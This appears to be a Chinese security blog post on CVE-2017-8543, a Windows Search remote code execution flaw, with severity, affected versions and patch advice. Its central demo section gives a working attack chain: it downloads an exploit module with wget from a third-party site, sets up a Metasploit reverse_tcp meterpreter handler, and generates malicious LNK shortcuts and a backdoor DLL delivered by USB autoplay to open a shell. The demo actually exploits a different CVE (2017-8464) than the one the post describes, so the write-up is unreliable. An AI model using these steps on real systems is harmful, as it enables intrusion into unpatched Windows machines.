0x01概述
我大概说一下,Windows Search是一个什么鬼东西,Windows Search是Windows搜索服务(WSS)即windows的一项默认启用的基本服务,允许用户在多个Windows服务和客户端之间进行搜索。当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。受影响的windows系统,我一会补充在下面。
0x02漏洞级别
漏洞级别:严重
(说明:漏洞级别共四级:一般、重要、严重、紧急)
0x03影响范围
桌面系统:Windows XP, Vista, 7, 8, 8.1, RT 8.1, 10(次不刺激?)
服务器系统:Windows Server 2003,2008,2012,2016
微软给出的参考说明:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8543
0x04进入演示攻击
那么网上给出的报告仅仅只是报告,我今天就来带大家演示一遍攻击过程。首先我要模拟攻击者和靶机。
kalix86 192.168.1.109 攻击机
windows7x64 192.168.1.101 目标靶机
1.kali主机下载cve_2017_8464_lnk_rce.rb:
cd /opt wget https://www.8090-sec.com/file/cve_2017_8464_lnk_rce.rb
将cve_2017_8464_lnk_rce.rb拷贝到
/usr/share/metasploit-framework/modules/exploit/windows/smb/目录下:
cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
生成监听shell:
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.109 msf exploit(handler) > exploit -j
生成大量的.LNK文件(对应盘符从D盘到Z盘)和要加载的.dll文件(后门文件, copy了一个lnk文件(根据插入靶机U盘后识别的盘符,例如我插入U盘后显示的E盘,所以就选择了E结尾的lnk文件)和dll文件到U盘)
msf exploit(handler) > back msf > use exploit/windows/smb/cve_2017_8464_lnk_rce msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.1.109 msf exploit(cve_2017_8464_lnk_rce) > exploit
将/root/.msf4/local/*所有文件拷贝到/opt目录下的test文件夹中,然后拷贝到目标靶机windows7X64上
root@backlion:~# cd /opt root@backlion:/opt# mkdir test root@backlion:/opt# cp /root/.msf4/local/* test/ root@backlion:/opt# cd test/ root@backlion:/opt/test# ls
拷贝的本机win7x64上:
然后点击快捷键,就会触发注册dll文件,如果不行直接注册dll文件(一般是将这项快捷键和DLL文件拷贝到一个文件夹里面然后拷贝到U盘,只要对方开了U盘自动启动播放功能,就会自动触发注册dll文件)
在kali下可以看到成功获得sesions会话为1
sessions -i 1
然后进入到会话,就会成功进入到metermter的shell界面:
到这里就演示结束了..
0x05排查方案
检查windows系统版本,如果版本在受影响的产品清单中,则受该漏洞影响。
0x06安全建议
1.在系统防火墙或者安全组对445端口进行限制;
2.升级建议:可通过Windows Update自动更新微软补丁修复漏洞,也可以手动下载补丁,补丁下载地址:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8543
注意:修复漏洞前请将资料备份,并进行充分测试。
发表评论